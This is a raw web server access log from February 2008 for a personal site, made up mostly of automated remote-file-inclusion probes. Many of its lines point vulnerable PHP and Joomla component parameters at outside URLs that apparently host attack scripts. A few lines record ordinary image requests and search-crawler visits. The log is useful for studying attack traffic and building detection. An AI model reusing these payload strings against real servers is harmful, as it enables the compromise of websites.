62.93.36.240 - - [19/Feb/2008:07:16:41 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.204.202.91 - - [19/Feb/2008:07:16:46 -0800] "GET /logs/access_080120.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.172.48.89 - - [19/Feb/2008:07:17:10 -0800] "GET /logs/access_071231.log//?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:07:17:10 -0800] "GET /logs/access_071231.log//?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:07:17:13 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sonarama.com/1.0/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:17:25 -0800] "GET /logs/access.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:17:25 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:17:25 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:07:17:44 -0800] "GET /logs/access_071228.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:07:17:49 -0800] "GET /logs/access.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:07:17:49 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:07:17:52 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:07:18:20 -0800] "GET /logs/access_071230.log//?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:07:18:20 -0800] "GET //?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:07:18:21 -0800] "GET /logs//?GALLERY_BASEDIR=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 35263 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:18:32 -0800] "GET /logs/access.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:18:33 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:18:33 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:19:12 -0800] "GET /logs/access_071224.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:19:37 -0800] "GET /logs/access_071221.log//components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [19/Feb/2008:07:19:37 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:19:37 -0800] "GET //components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:19:37 -0800] "GET /logs//components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:07:20:09 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:07:20:40 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:07:20:40 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:07:20:40 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:20:51 -0800] "GET /logs/access.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:07:20:51 -0800] "GET /logs/access_080211.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:20:51 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:20:52 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.241.10 - - [19/Feb/2008:07:20:54 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://2eat.com.au/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.241.10 - - [19/Feb/2008:07:20:54 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://2eat.com.au/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.234.71.230 - - [19/Feb/2008:07:20:54 -0800] "GET /print.php?page=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.90.29 - - [19/Feb/2008:07:21:15 -0800] "GET //skin/zero_vote/error.php?dir=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
83.149.90.29 - - [19/Feb/2008:07:21:15 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
85.114.132.12 - - [19/Feb/2008:07:21:28 -0800] "GET /logs/access_071225.log//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [19/Feb/2008:07:21:29 -0800] "GET /logs//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [19/Feb/2008:07:21:40 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [19/Feb/2008:07:21:40 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [19/Feb/2008:07:21:41 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [19/Feb/2008:07:22:58 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.43.197.73 - - [19/Feb/2008:07:23:11 -0800] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.43.197.73 - - [19/Feb/2008:07:23:11 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.43.197.73 - - [19/Feb/2008:07:23:17 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.58.146 - - [19/Feb/2008:07:23:18 -0800] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [19/Feb/2008:07:23:18 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.255.3.76 - - [19/Feb/2008:07:23:19 -0800] "GET /logs/access_080105.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.76 - - [19/Feb/2008:07:23:20 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.76 - - [19/Feb/2008:07:23:20 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.76 - - [19/Feb/2008:07:23:38 -0800] "GET /logs/access_080130.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.58.146 - - [19/Feb/2008:07:24:45 -0800] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:07:24:58 -0800] "GET /logs/access_080211.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [19/Feb/2008:07:25:59 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [19/Feb/2008:07:25:59 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:07:26:27 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:26:39 -0800] "GET /logs/access_080211.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:27:29 -0800] "GET /logs/access_071221.log//components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:27:29 -0800] "GET //components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:27:30 -0800] "GET /logs//components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:04 -0800] "GET /bikes/dteel/2008_02_15/IMG_4501s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:04 -0800] "GET /bikes/dteel/2008_02_15/IMG_4516s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:04 -0800] "GET /bikes/dteel/2008_02_15/IMG_4519s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:04 -0800] "GET /bikes/dteel/2008_02_16/IMG_4543s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:05 -0800] "GET /bikes/dteel/2008_02_16/IMG_4547s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:05 -0800] "GET /bikes/dteel/2008_02_16/IMG_4557s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:05 -0800] "GET /bikes/dteel/2008_02_16/IMG_4527s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:05 -0800] "GET /bikes/dteel/2008_02_15/IMG_4522s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:05 -0800] "GET /bikes/dteel/2008_02_16/IMG_4524s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:05 -0800] "GET /bikes/dteel/2008_02_16/IMG_4525s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
68.105.139.122 - - [19/Feb/2008:07:28:05 -0800] "GET /bikes/dteel/2008_02_16/IMG_4536s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=35714" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
72.36.191.42 - - [19/Feb/2008:07:28:36 -0800] "GET /logs/access_080211.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [19/Feb/2008:07:28:36 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [19/Feb/2008:07:28:36 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.232 - - [19/Feb/2008:07:28:44 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.255.32.189 - - [19/Feb/2008:07:30:00 -0800] "GET /convert/mvcw.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:07:30:19 -0800] "GET /logs/access_080126.log//styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.229.88 - - [19/Feb/2008:07:30:33 -0800] "GET //?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.cartographia.org/ftp/files/source/SinG?? HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:30:33 -0800] "GET /logs/access_080211.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.229.88 - - [19/Feb/2008:07:30:34 -0800] "GET /logs//?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.cartographia.org/ftp/files/source/SinG?? HTTP/1.1" 200 35992 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
88.191.30.136 - - [19/Feb/2008:07:30:36 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.43.197.73 - - [19/Feb/2008:07:30:38 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.28.10 - - [19/Feb/2008:07:30:54 -0800] "GET /logs//tools/send_reminders.php?includedir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.191.28.10 - - [19/Feb/2008:07:31:03 -0800] "GET //tools/send_reminders.php?includedir=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.36.191.42 - - [19/Feb/2008:07:31:23 -0800] "GET /logs/access_080211.log//?index.php?mosConfig_absolute_path=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [19/Feb/2008:07:31:23 -0800] "GET //?index.php?mosConfig_absolute_path=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [19/Feb/2008:07:31:24 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 200 35263 "-" "libwww-perl/5.805" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:32:08 -0800] "GET /logs/access.log//phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:32:09 -0800] "GET //phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:07:32:09 -0800] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.36.191.42 - - [19/Feb/2008:07:32:14 -0800] "GET /logs/access.log//?index.php?mosConfig_absolute_path=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:32:38 -0800] "GET /logs/access_071221.log//components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:32:38 -0800] "GET //components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:07:32:39 -0800] "GET /logs//components/com_smf/smf.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.178.114.10 - - [19/Feb/2008:07:33:24 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.lirik.biz/skins/bobbyzhuo/.debug/rox.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
195.178.114.10 - - [19/Feb/2008:07:33:24 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.lirik.biz/skins/bobbyzhuo/.debug/rox.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.114.132.12 - - [19/Feb/2008:07:34:47 -0800] "GET /logs/access.log//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.71.24 - - [19/Feb/2008:07:35:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.71.24 - - [19/Feb/2008:07:35:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.102.10.26 - - [19/Feb/2008:07:36:31 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.234.71.230 - - [19/Feb/2008:07:36:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.26.158 - - [19/Feb/2008:07:38:28 -0800] "GET /tmp/sess_d447df9d638ffba113ddf583a0887045 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:07:38:38 -0800] "GET /logs/access_080131.log//?step=1&vwar_root=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:07:38:39 -0800] "GET //?step=1&vwar_root=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:07:38:40 -0800] "GET /logs//?step=1&vwar_root=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 200 35263 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:07:38:49 -0800] "GET /logs/access_080123.log//styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.149 - - [19/Feb/2008:07:39:21 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.149 - - [19/Feb/2008:07:39:22 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
